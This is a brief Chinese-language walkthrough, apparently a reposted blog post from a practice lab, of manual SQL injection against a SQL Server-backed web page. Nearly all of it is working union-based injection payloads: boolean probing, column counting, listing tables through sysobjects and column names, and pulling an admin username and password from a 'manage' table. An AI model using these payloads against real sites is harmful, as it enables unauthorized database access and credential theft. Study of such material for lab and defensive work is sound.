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SQL手工注入漏洞测试(Sql Server数据库)


寻找注入点 and 1=1 ,and 2=1

判断字段 order by N# 虽然3报错,但4有回显。判断是4个字段

查看回显位置id=2 and 2=1 union all select 1,2,‘3’,4#

查询数据库id=2 and 2=1 union all select 1,2,db_name(),4#

查询表 id=2 and 2=1%20 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’),‘3’,4# sysobjects是保存数据的表,xtype是对象类型 u表示User Table

查询列id=2 and 2=1%20 union all select 1,(select top 1 col_name(object_id(‘manage’),1) from sysobjects),‘3’,4

查询字段id=2 and 2=1 union all select 1,(select username from manage),(select password from manage where username in (‘admin_mz’)),4

来源: https://blog.csdn.net/qq_36933272/article/details/100171886